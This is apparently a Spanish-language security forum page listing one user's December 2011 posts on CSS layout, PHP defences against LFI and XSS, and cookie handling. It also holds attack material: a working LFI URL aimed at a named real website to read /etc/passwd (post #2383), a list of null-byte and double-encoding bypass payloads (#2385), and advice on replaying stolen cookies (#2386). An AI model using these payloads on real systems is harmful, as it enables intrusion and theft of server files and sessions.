Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#2381
Desarrollo Web / Re: align="center" en css
31 Diciembre 2011, 19:23 PM
aahh muchas gracias, y que tiene que ver el margin con el centrado si por defecto las divisiones comienzan con margin 0? que cosa le asigna con auto? normalmente auto debería asignar un valor existente dentro de la propiedad margin, está bién curioso, nunca pensé que un margin pudiera definir el centrado de una división :P gracias.
#2382
Desarrollo Web / align="center" en css
30 Diciembre 2011, 14:07 PM
Estaba averiguando que no es lo mismo decir align="center" a decir style="text-align: center;".

Digamos que tengo el siguiente ejemplo:
Código (html4strict) [Seleccionar]

<div style="text-align: center;">
<div style="text-align: left; width: 50%; border: 1px solid black;">Hola  </div>
</div>


No me centra la división pero si los textos y yo no quiero centrar los textos sino la división, por lo cual tube que poner un text-align left y align:

Código (html4strict) [Seleccionar]

<div align="center">
<div style="text-align: left; width: 50%; border: 1px solid black;">Hola  </div>
</div>


Ahi si funciona.


Entonces en resumidas cuentas ¿cual es mi pregunta?...
Como puedo hacer un align="center" solo con css? ya que antes usaba <center> pero me di cuenta leyendo el rfc de html que está deprecated o sea obsoleto asi que lo reemplazé por align center, pero y si quiero controlar esas cosas atraves de hojas de estilo como lo puedo hacer?

Intenté poniendo position relative y tmpoco funciona, la única manera es en firefox con moz-box y ahi se centra bién pero la idea es hacerlo en los demás exploradores también (internet explorer no me interesa, es un caso perdido, un asco de explorador, pero por lo menos que ande en opera y chrome).

Gracias para el que pueda darme una mano :)
#2383
Cita de: PanConMantequilla en 21 Diciembre 2011, 20:13 PM

Uso wamp, y el codigo tambien lo probe en debian y me bota el mismo warning error, no solo eso, cada vez que encuentro un LFI siempre me arroja ese error.
Siento que esa vulnerabilidad solo existiera para el resto  :-\

Toma, para que no te quedes con las ganas de nunca haber probado un LFI con null byte
http://www.ecobead.ie/index.php?option=com_svmap&controller=../../../../../../etc/passwd%00
#2384
Quiero comenzar abriendo este post para poder ir poniendo todos los cast o parser mas utiles para filtrar strings, objetos, etc de la mejor forma posible y no tener que andar buscando de un lugar para otro.

Información adicional de casting básico:
http://php.net/manual/es/language.types.type-juggling.php
http://foro.elhacker.net/nivel_web/como_evitar_la_inyeccion_sql-t252384.0.html



A veces necesitamos llamar a un archivo desde peticiones get o post y debemos evitar LFI, una forma es haciendo un file_exists() y preg match de esta forma:

Código (php) [Seleccionar]
<?php
if(file_exists($file './module/'.preg_replace('|[^A-Za-z0-9_\-]|i'''$_GET['file']).'.php'))
include($file);
unset(
$file);
?>


El problema es que siempre queda la posibilidad de bypasear los strings o meterse donde uno no debe, talves un archivo restringido como llamar al index.php principal, por eso desde hace algún tiempo estoy utilizando algo muchisimo mas limpio y efectivo y evita el 100% de los ataques LFI y RFI:

Código (php) [Seleccionar]
<?php
if(in_array(($file './module/'.$_GET['file'].'.php'), glob('./module/*.php')))
include($file);
?>


De esta forma la función glob() nos dará un array con todas las rutas que contengan un archivo php dentro del directorio módulos, asi que si tratamos de hacer un LFI nos dará negativo siempre:

Código (php) [Seleccionar]
<?php
$files 
glob('./module/*.php')
echo 
'./module/'.$_GET['file'].'.php es igual a '.$files[0].' ???';
?>


Citar./module/../../../../config/config.php es igual a ./module/main.php ???



Siempre he visto en varios post dentro del foro sobre como saber si un string es una dirección e-mail o no, pues fácil:
Código (php) [Seleccionar]
filter_var('test@gmail.com', FILTER_VALIDATE_EMAIL)

Debuelve true o false.



Alguna ves has necesitado ingresar una string dentro de un tag <script> sin que te salga un xss?

Digamos que tengo esto:
Código (php) [Seleccionar]
<script>
var test = '<?php echo addslashes(htmlspecialchars($_GET['test'], ENT_QUOTES)); ?>';
</script>


Dejemne decirles que los que utilizan addslashes o htmlspecialchars están expuestos a un xss o a que simplemente no funcione siempre bién ya que addslashes y htmlspecialchars no filtran cosas como saltos de linea, parentesis y comentarios, por lo tanto con un simple %0a%0d puedes comenzar a inyectar código arbitrario.

Que hacemos en este caso?
Lo que google hace es pasar todo a unicode y los carácteres especiales quedan algo así: \u0010, pero yo lo hago de una forma mucho mas efectiva, limpia y con menos bites:

Código (php) [Seleccionar]
<script>
var test = '<?php echo str_replace(array('+''%'), array(' ''\x'), urlencode($_GET['test'])); ?>';
</script>


De esta forma todos los carácteres especiales incluyendo saltos de linea quedarán así:

Código (php) [Seleccionar]
<script>
var test = '\x0a\x0cprueba de caracteres\x3c\x22';
alert(test);
</script>


La ventaja es que javascript interpreta de forma nativa los valores hexadecimales los pases a comillas simples o a comillas dobles asi que podrás seguirlo usando tan normal como siempre:

Código (php) [Seleccionar]

<div></div>
<script>
var test = '\x0a\x0cprueba de caracteres\x3c\x22';
$('div').text(test);
</script>
#2385
bypasea esto:

Código (php) [Seleccionar]
<?php include('./paginas/'.$_GET['page'].'.php'); ?>

Siempre he dicho que para aprender a vulnerar un sitio web es necesario aprender su lenguaje primero.

Puedes usar null byte de muchas formas:
%0 %00 %000 \0 \00

También puedes probar si el sistema urlencodea dos veces las variables o las filtra:
%2500 %255c0 %255c00
#2386
Nivel Web / Re: Pequeña duda sobre robo de cookies
21 Diciembre 2011, 02:44 AM
Cita de: 0x5d en 18 Diciembre 2011, 19:25 PM
No solo eso, si tu robas una cookie SMF, en la cual indicaste que tu sesión
será de 60 minutos, la cookie ultrajada solo durará esos 60 minutos.

Saludos.

No es así, solo quiere decir que la cookie se enviará durante ese tiempo pero no quiere decir que solo sirva 60 minutos, de hecho puedes robar una cookie que dure 30 segundos y usarla todo un año si quieres.

Las duraciones de las cookies se manipulan a nivel cliente y no a nivel servidor por lo tanto es solo cosa de editar la cookie desde algún complemento como el cookies edit de firefox o modificando cabeceras para validar cookies que han durado poco tiempo.

Lo que si es posible es que un sistema web tome la duración de la cookie que has asignado en tu acceso de usuario y desde la base de datos darle tiempo limite a la sesión pero en este casi smf no lo hace y casi nadie lo hace.

En el caso de hotmail es un poco mas complejo porque hay valores ocultos dentro de la cookie cifrados que incluyen fechas y utilizan la base de datos directamente para darle tiempo de vida a las cookies asi que si robas una cookie de hace 1 año no te servirá hoy, además creo que valida otras cosas que no he averiguado pero creo que debes suplantar muchas mas cosas que solo una cookie.
#2387
Seguridad / Re: Recuperacion de contraseña
20 Diciembre 2011, 01:08 AM
debe contactarse con el staff de facebook o utilizar el enlace de recuperación de contraseña de la misma página.
#2388
Debes tener algún sitio web agregado al adblock por equibocación y por eso no te toma ninguna imágen.

Te recomiendo limpiar el listado de tu lista negra.
#2389
Hacking / Re: cambiar (falsificar) un documento
15 Diciembre 2011, 02:02 AM
si no sabes usar photohop estas jodido porque para falsear documentos necesitas ser demasiado preciso, no es llegar y pegar cuadrados blancos y escribir sobre ellos.
#2390
Todo esto en orden:

Citartelnet www.gogle.com 80
GET / HTTP/1.1
host: www.google.com
connection: close

Después presionas enter dos veces.